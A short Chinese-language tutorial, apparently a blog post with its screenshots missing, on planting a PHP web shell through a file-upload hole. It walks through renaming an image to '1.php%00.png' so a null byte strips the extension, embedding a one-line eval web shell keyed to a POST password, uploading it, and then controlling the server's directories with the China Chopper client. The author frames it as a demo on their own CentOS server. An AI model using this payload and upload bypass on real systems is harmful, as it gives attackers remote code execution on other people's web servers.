在kali的裏面隨機找一張png結尾的圖片,然後重命名一下改成1.php%00.png。
改成這樣的名字!!
然後用編輯器編輯一下!
在空白處寫入一句話木馬!!<%php @eval($_POST[pass]);?>
像這樣:
然後保存!
打開burpsuit抓個包看看!!
可惜了,我們用了%00截斷不需要改包!
這樣就上傳成功!!!
在菜刀地址上填上上路徑!!再填上上密碼!!!
就可以看見我的服務器裏面的目錄了,因爲我的centos 7 所以羅!
然後我們進入我的服務器端看看!!
畫紅線的就是我們上傳的木馬!!!